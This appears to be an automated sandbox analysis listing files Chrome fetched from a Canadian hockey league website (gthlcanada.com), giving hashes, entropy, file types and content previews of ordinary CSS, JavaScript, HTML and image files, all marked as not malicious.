                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................`..........................!.1..AQ."aq2...#B...R...3br..$C....%4S......DWcs..5E...'678GTeuv.....................................@........................!1.A.Qa.."q..2B...#R......b..$%r.34S..............?..6.v.K....4>..cQ.F.:}U.?v./'.w..:}....-H.Q5....0.t..O.+..#r.E(e.......b.....m.H..P...=.P...nN.= .*.L..A..m.-......iEM=..X..i..~.J.*m..q,.2....M2.GZ.u..%)..s.>..`..C.rT..Q..ZH.......-AN.a.=...:...O.`d.o.aDq..N.e|8.+.T.i...T..u..r..4F..[......*........_.....NT.q.nu.s...Z\.....t.....D...em.rBw...i'.G..'.pm.AsH.).e..."j...$.1T,*.....q.a.z..PI$.....?..rr.q.....Qm.V..0..k.ufLI.#.X;..8...,k.w.[i....|@o.|}.N.~.....IP)=.....H+6e.p.[.5.h..C.Y..w.....U./W....%...D....N..;......2..K.....?}Z..t......5v.....m...t..8#...z..&...RB......N:T...e2.H..H..x........
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):102
                                                                                                                          Entropy (8bit):4.8035671313969885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:JSbMqSL1cdXWKQKFcM6Qaxp3T2TjWaee:PLKdXNQKFtaxZT2TjL
                                                                                                                          MD5:C206147C7CAE99642A4F8A2C640A0019
                                                                                                                          SHA1:8C32B7B7E0807BBE85E5C8C94F87AFEA31EEDC40
                                                                                                                          SHA-256:6F55ADBECCE78B9C566F8DC830177DC91782702FF35F213F009FC2B902E25603
                                                                                                                          SHA-512:0D94AA53B801AC69A9BB4A7DF4FC0E00B6FFD1C5668A6FEE4EFC11986B7F516EB27A8A0197C0106A4295ACD5F63C222EA2F1BD9431BF2D689672AC91C5528EB6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:importScripts('https://www.gstatic.com/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/recaptcha__en.js');
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):22340
                                                                                                                          Entropy (8bit):5.275837797169686
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:pCf5CgCPCrCyUC/qY4+C4CYCpCfMC1CWC6CyhC/qY4XCNCtC4CfdCkCDC3CyQC/+:pKhOoJUaRbn07Un9JhaEqOFulqsJQaVg
                                                                                                                          MD5:C268BA0034256FA47F20717AE957D2E3
                                                                                                                          SHA1:DD279419EA9FECA0DF83BEABA275FF60CA86A266
                                                                                                                          SHA-256:64844418672FB04551FF1EFF840DAC76F2A5DD40FD8DC8DC0838285D228C32C8
                                                                                                                          SHA-512:C2454D31048291B6EACE23057FB3D1971132FF62BC4383CBC342178550B274CFD66241C374BAEDF4D1D4A92C302A825A2BC55DB1617EF55CCF0FC475145D6A3A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700;900&display=swap
                                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-fam
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (310)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):97372
                                                                                                                          Entropy (8bit):4.77653886537852
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:oYVAo7ze4UOv8BBKnNAFaLjkl7OO+Ea2ws7DW7OzmUwOQwODP6zG868:nAqacqdgOD0Y
                                                                                                                          MD5:850E85236B354062F5B0C97EE4A11934
                                                                                                                          SHA1:416FFA9A1BF798656F01940C6578FADF37128AA6
                                                                                                                          SHA-256:F2687D0460611ACA9246416A471B3EC015D9B9FF73136F9E18027C4AECBC9AEA
                                                                                                                          SHA-512:87C227AC8FFD1DF7741FCFCCA42CB2E6837A4187490FA711285A519392C5814BDC333360482DD25DC6BB9893FF061605E830CC1EF239879BF26C0B7A06DFA5DC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/latest_news/public/css/latest-news-public.css?ver=1.0.0
                                                                                                                          Preview:/**. * Foundation for Sites by ZURB. * Version 6.4.4-rc1. * foundation.zurb.com. * Licensed under MIT Open Source. */. .tcb .tcb-items-2,. .tcb .tcb-items-3,. .tcb .tcb-items-4 {. margin-bottom: 15px; }. .tcb .tcb-items-2 .tcb-content,. .tcb .tcb-items-3 .tcb-content,. .tcb .tcb-items-4 .tcb-content {. position: absolute;. left: 0;. right: 0;. bottom: 0;. background: transparent;. padding: 15px; }. .tcb .tcb-items-2 .tcb-link,. .tcb .tcb-items-3 .tcb-link,. .tcb .tcb-items-4 .tcb-link {. height: 100%; }. .tcb .tcb-items-2 .tcb-top,. .tcb .tcb-items-2 .tcb-bottom,. .tcb .tcb-items-3 .tcb-top,. .tcb .tcb-items-3 .tcb-bottom,. .tcb .tcb-items-4 .tcb-top,. .tcb .tcb-items-4 .tcb-bottom {. position: relative;. z-index: 30;. background: white; }. .tcb .tcb-items-2 .tcb-content-items-container,. .tcb .tcb-items-3 .tcb-content-items-container,. .tcb .tcb-items-4 .tcb-content-items-container {. height: 100%; }. .tcb .
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):122864
                                                                                                                          Entropy (8bit):7.9631275387014036
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:eO0kD1awla34/tM4nOZAGeg7mPoT1stYqJlym3NWeE:NprzlMwKAGeg7RT1st/7ym3geE
                                                                                                                          MD5:9C4B1656FD7092D4480B8FA028B98BF8
                                                                                                                          SHA1:C541E8A78B68451819548D6A64D7E37808475466
                                                                                                                          SHA-256:BE536112133E8CAE9BDA79D08C7C68540A3566A656B1CD2BDACDC67CBBE92318
                                                                                                                          SHA-512:BD56D560DD0B0455821015A3AD115A57F30755B96B1A129831B3B9D61DDA457EB8445B0D2E8EBD885599ACA02E25D9C7D832340F65D828935AE20AF15C702C40
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................`..........................!.1..AQ."aq2...#B...R...3br..$C....%4S......DWcs..5E...'678GTeuv.....................................@........................!1.A.Qa.."q..2B...#R......b..$%r.34S..............?..6.v.K....4>..cQ.F.:}U.?v./'.w..:}....-H.Q5....0.t..O.+..#r.E(e.......b.....m.H..P...=.P...nN.= .*.L..A..m.-......iEM=..X..i..~.J.*m..q,.2....M2.GZ.u..%)..s.>..`..C.rT..Q..ZH.......-AN.a.=...:...O.`d.o.aDq..N.e|8.+.T.i...T..u..r..4F..[......*........_.....NT.q.nu.s...Z\.....t.....D...em.rBw...i'.G..'.pm.AsH.).e..."j...$.1T,*.....q.a.z..PI$.....?..rr.q.....Qm.V..0..k.ufLI.#.X;..8...,k.w.[i....|@o.|}.N.~.....IP)=.....H+6e.p.[.5.h..C.Y..w.....U./W....%...D....N..;......2..K.....?}Z..t......5v.....m...t..8#...z..&...RB......N:T...e2.H..H..x........
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (22143), with CRLF, LF line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):106909
                                                                                                                          Entropy (8bit):5.088490294948374
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:JKuwUig0o9xpHXh8IpvO75LE3L47j73p+IsI0Z15AVaeJI0AtD6CV:lwUiaHx80cp8I0Z15KI0A16CV
                                                                                                                          MD5:2C64145D8B382138196681E076D315FE
                                                                                                                          SHA1:CEA7785AE589E136E581B8C325748557DEE937D6
                                                                                                                          SHA-256:4D19AC7F0729768037B0624719342D6D4E16DFEB1590667C1B32F5020AD6C399
                                                                                                                          SHA-512:3B04432BDBC38ACA731EAED844BE781EE8E59C9C7EC35E229B5E019815B19E6C6B7BFEDC36C91E3A4954FDDDDA5BCD67AB045F180065AE56EE3E8C36723E8479
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/
                                                                                                                          Preview:<!doctype html>.<html class="no-js" lang="ENH">.. <head>. <meta charset="utf-8">. <meta http-equiv="x-ua-compatible" content="ie=edge">. <meta name="viewport" content="width=device-width, initial-scale=1">. <link rel="shortcut icon" href="https://gthlcanada.com/app/themes/gthl/favicon.ico" />. <link rel="alternate" type="application/rss+xml" title="Post Feed" href="http://gthlcanada.com/feed?postType=post"/>. <link rel="alternate" type="application/rss+xml" title="Gallery Feed" href="http://gthlcanada.com/feed?postType=gallery"/>. <link rel="alternate" type="application/rss+xml" title="Video Feed" href="http://gthlcanada.com/feed?postType=video"/>. <link rel="stylesheet" href="https://secure.widget.cloud.opta.net/v3/css/v3.football.opta-widgets.css">. <title>GTHL &#8211; Official Site of the GTHL</title>..<link rel="stylesheet" href="https://gthlcanada.com/app/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.3.5" type="text/css" media="all" />...<script ty
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):665
                                                                                                                          Entropy (8bit):7.42832670119013
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUelyuRs56fyKgIEInu5VLJBZInmJhd/3VqQXD8GBm1:belFRs56fuIEIu5VNBZInMTICfBO
                                                                                                                          MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                                                                                          SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                                                                                          SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                                                                                          SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2343)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):52916
                                                                                                                          Entropy (8bit):5.51283890397623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 728x90, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):63506
                                                                                                                          Entropy (8bit):7.91603752918064
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:/vKVj8neWIb3ZLURIFWwH/BwaKw94gFz/P:/vKl8neWIbSRIFxdugFzX
                                                                                                                          MD5:BA30E3CEB3A02F8F4C7F8E8339FB1528
                                                                                                                          SHA1:5D0D0F68031C4496812C13E363D5228FA4DEF1B5
                                                                                                                          SHA-256:72EF9FD7D76A2D17537B3D28C8DBCA482E4429AC2AE49B3909A66E8616B7B269
                                                                                                                          SHA-512:FD09210549CDE8629E996A1CF3672406D0BFE7CD8BE9068852E99E863D6E100319DA66A5E6831A7825D4CB76740F5E37C1AF72DAAFAAD3A2B39656F608791593
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tpc.googlesyndication.com/simgad/680043046894060073
                                                                                                                          Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Refer
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (5520)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5566
                                                                                                                          Entropy (8bit):5.240611776640752
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yooivd0TDZBx/ZcxYSWFSqDdBfJqbohjWcRSVJm/dK8249rz1H:yooHDT5vSSzDdBfQbsjWsSVJm/IUDH
                                                                                                                          MD5:C5909AD4EF00C7CF19155394F7E77AA5
                                                                                                                          SHA1:3DAB4FD10C091F64BFEA4A8E0EF0A50EDF4A602B
                                                                                                                          SHA-256:561F002545E54F4A58FB3A5D4BC881B8D5F55D41FB9BC861A32BB0C8075F0236
                                                                                                                          SHA-512:834C76F6BB0F1CF4A7C145399FE9C5E343DEC1C65DBC745D6C36E926F0398DD67DF8BCA85D1322CDDC80B5C35005D504C319DEA81FFA0F55E2157384180307EB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/base/bower_components/jsTimezoneDetect/jstz.min.js
                                                                                                                          Preview:/*! jsTimezoneDetect - v1.0.6 - 2014-02-25 */.!function(a){var b=function(){"use strict";var a="s",c=function(a){var b=-a.getTimezoneOffset();return null!==b?b:0},d=function(a,b,c){var d=new Date;return void 0!==a&&d.setFullYear(a),d.setMonth(b),d.setDate(c),d},e=function(a){return c(d(a,0,2))},f=function(a){return c(d(a,5,2))},g=function(a){var b=a.getMonth()>7,d=b?f(a.getFullYear()):e(a.getFullYear()),g=c(a),h=0>d,i=d-g;return h||b?0!==i:0>i},h=function(){var b=e(),c=f(),d=b-c;return 0>d?b+",1":d>0?c+",1,"+a:b+",0"},i=function(){var a=h();return new b.TimeZone(b.olson.timezones[a])},j=function(a){var b=new Date(2010,6,15,1,0,0,0),c={"America/Denver":new Date(2011,2,13,3,0,0,0),"America/Mazatlan":new Date(2011,3,3,3,0,0,0),"America/Chicago":new Date(2011,2,13,3,0,0,0),"America/Mexico_City":new Date(2011,3,3,3,0,0,0),"America/Asuncion":new Date(2012,9,7,3,0,0,0),"America/Santiago":new Date(2012,9,3,3,0,0,0),"America/Campo_Grande":new Date(2012,9,21,5,0,0,0),"America/Montevideo":new Dat
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65308)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):396902
                                                                                                                          Entropy (8bit):5.162193632893908
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:Q2EOHOxFre4aOOm/EhzzTPTqYAuCjB6Itp8cvXG4DLeZ5pqIYZ/yPqwvor04YIP1:smhfqDHvXGT0FiTanS+EFMR7Ii
                                                                                                                          MD5:84B14A8F33B3A8B0C0BFE02E0500AC57
                                                                                                                          SHA1:F92C6F578D2C6F2E77234CDB26F4DBA72B2706C2
                                                                                                                          SHA-256:8832A19DDBDAF280C17544CE4F233312AEB16ECEC829F46BD88815BB2DA2C6F9
                                                                                                                          SHA-512:B6C48EE43538830CB1E1FFAED35640CC74E074683129A246F9CDE95A747A1228305C83A0EA6AD5E3F533C5114E1D310935B2F72BFD63844668CDFC4E6536F716
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://secure.widget.cloud.opta.net/v3/css/v3.football.opta-widgets.css
                                                                                                                          Preview:/**. * opta-widgets - v3.236.0. * Copyright (c) 2024 Opta Sports. * Licenses: http://widget.cloud.opta.net/v3/licences.txt. */..@import url(https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700;900&display=swap);..Opta div,.Opta span,.Opta h2,.Opta h3,.Opta h4,.Opta p,.Opta a,.Opta abbr,.Opta img,.Opta dl,.Opta dt,.Opta dd,.Opta ul,.Opta ol,.Opta li,.Opta form,.Opta fieldset,.Opta figure,.Opta figcaption,.Opta label,.Opta legend,.Opta table,.Opta tbody,.Opta thead,.Opta tfoot,.Opta tr,.Opta th,.Opta td,.Opta canvas{margin:0;padding:0;border:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;font-size:12px;font-style:normal;font-weight:normal;vertical-align:baseline;line-height:1.1}.Opta a{background:rgba(0,0,0,0);word-wrap:break-word}.Opta a:active,.Opta a:hover{outline:0}.Opta abbr{text-decoration:none}.Opta img{border:0}.Opta svg:not(:root){overflow:hidden}.Opta button{margin:0;cursor:pointer;
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 300 x 250, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):138064
                                                                                                                          Entropy (8bit):7.990966101533749
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:7emsKpfjb2N4pFldAlHBI8nFYEz5rZ6LNpQvZvX7ph:7cKhjKGpJGh3ndzuPQR
                                                                                                                          MD5:D3EB58B6C3D8FADEF5C2AAE231CFE247
                                                                                                                          SHA1:C630DDA3C60E4E059F482AA13AF998107C7FDDE5
                                                                                                                          SHA-256:FE718ECBFD27B19F8673ECEB0AFFF09E35B5B3B74DA1592F1EB1113C0428C265
                                                                                                                          SHA-512:D6D4B124E1A4A60FD385CBC1D89E5F5D1884A832B845F57C286E59DC720B7D73FF15E5671B05B1ACA3BBC1E1078753F1AECE126771251AF5786D2B9E7CFB86B3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...,..........mz.....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (50938)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):51080
                                                                                                                          Entropy (8bit):5.087818998975706
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Q4boY5Z7cYA4ZiFoexb65nFcaZ3QNrAagX:Q4sY5ZoF4he/8
                                                                                                                          MD5:677B8BC41CD60E0B9D4AF67E76D732FC
                                                                                                                          SHA1:AA8D413ED447348DCE3120D42326323B8C5D93BA
                                                                                                                          SHA-256:A501B3EE9D50334D30E7F71CA8F36A4BAFB0BCB5E5C4EC8BF9AFACAE0B047B98
                                                                                                                          SHA-512:8F02960516E577A544AF2D7730138D2917F1F0C14F0A38BD6F336069E302AC84597E0BC90C3907BC6FC9FB22BCDB92B2C60C0DA652BDB5410AB66080F69893B0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/gthl/assets/dist/css/theme.css
                                                                                                                          Preview:.@import url(https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css);@import url(https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,700,300,600);@import url(https://fonts.googleapis.com/css?family=Lato);body{font-family:"Lato",sans-serif;font-size:1em}form,input,textarea,select{font-family:"Lato",sans-serif}.news-post__tag,.filter-group__title,.post-group-item__tag,.article__tag-link{font-size:0.6875em;font-weight:bold;text-transform:uppercase;letter-spacing:0.5px;color:#22356F}.article__body h1,.page-body h1,.sectioned-content-page h1,.article__title{margin:5px 0 10px 0;font-size:1.5em;font-weight:bold;line-height:1.2}@media (min-width: 768px){.article__body h1,.page-body h1,.sectioned-content-page h1,.article__title{font-size:2.25em}}.default-h2,.article__body h2,.page-body h2,.sectioned-content-page h2,h2{margin:5px 0 10px 0;font-size:1.125em;font-weight:300;line-height:1.2}@media
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, manufacturer=Apple, model=iPhone SE (2nd generation), orientation=upper-left, xresolution=180, yresolution=188, resolutionunit=2, software=15.6.1, datetime=2022:11:13 14:45:31, hostcomputer=iPhone SE (2nd generation)], baseline, precision 8, 730x437, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64973
                                                                                                                          Entropy (8bit):7.940331438094729
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:b0qOjUJyR+ti4telWL0IkUh6z2DX19D2KSeYVvSxkZ4:b0GyUteGkUkwjSKSeYW
                                                                                                                          MD5:7B82E84F2721A84E65723EF64DC19ABE
                                                                                                                          SHA1:D73987FE00605574A35EA1187521F405528C4207
                                                                                                                          SHA-256:68746EAFFBFB7BA49E8AF2A87C815B16C9FDB674AE1AC6BBF48B76300FA7CB5D
                                                                                                                          SHA-512:C59B7FA70856D737837443548903418756D8B8685BECE5853528983840FB2FDD992CA042DA1C82D5EC76A7CF2D9CB7C822CA925D72B0B535A068FBB1614D1310
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....H.H......Exif..MM.*...................................................................(...........1...........2...........<.......................i..............Apple.iPhone SE (2nd generation).....H.......H....15.6.1..2022:11:13 14:45:31.iPhone SE (2nd generation)...%........................"...........'.......(..........0232.....................................................................................................................&...............................................6.|.........>........769.........769.........0100..............................................................................................<.........-...............2.........D.3.........d.4.....4...j.`.....................x........2022:11:13 14:45:31.2022:11:13 14:45:31.-05:00..-05:00..-05:00.............'..~E...o..$A...............d.......1Apple iOS...MM."...............................h...............................................................B...........Z...........K....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=9, manufacturer=Canon, model=Canon EOS 2000D, orientation=upper-left, xresolution=144, yresolution=152, resolutionunit=2, datetime=2023:11:26 00:31:55], baseline, precision 8, 730x380, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):58210
                                                                                                                          Entropy (8bit):7.934804587571897
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:KX1Z4oJfIr8dLn6pMPU0fUzWg3gN8N71l6iYfL:s4GG8B60U0MZzZ4fL
                                                                                                                          MD5:0086C3B9B8E62A82DBEEFF358F329FEA
                                                                                                                          SHA1:3A4A4DF55D401F09AFD7849F22FAE1B58BB22FCF
                                                                                                                          SHA-256:8EE378A0B460259D32C5788EE05C5402973C3ACDF1F3CB636BA61AF83ED472D7
                                                                                                                          SHA-512:115C84A3B374C48E5A0686A75B9233D20CDF1B402BAEE21D72156A2508DDB0627DE068B3E099D6FE5E1038D6282E90A93EA8A96E0D31B45DA6FEDDD2820E9DCF
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....H.H.....,Exif..MM.*.................z.................................................(...........2.......................i..............Canon.Canon EOS 2000D....H.......H....2023:11:26 00:31:55..#...........^...........f."...........'...........0...........2..................0230...........n....................................................................................................................98..........98..........98..........0100.......................p................................................................................................1..........2..........4...........5..................... ........2023:11:26 00:31:55.2023:11:26 00:31:55....M..........................u,.........O@......=.....Q287031002628..................................EF-S18-200mm f/3.5-5.6 IS.00004609b9.......(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x250, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):87962
                                                                                                                          Entropy (8bit):7.979425214924049
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:7y3AwbQAZouWlozt/k6gsEymMXG3hH34iO20+H6+3Ie5296N3:7y37QpuWyzC6gVyHWRIiO5E4cC6N3
                                                                                                                          MD5:4ACB2561715FB939FA4403A1FE259898
                                                                                                                          SHA1:5450936329559A5FD50FA9D5208B7FB81C7E6ED9
                                                                                                                          SHA-256:84B564D332E4499B17617AC5F84E0AC17F3FAE81330B4E4E9FCF741938176B97
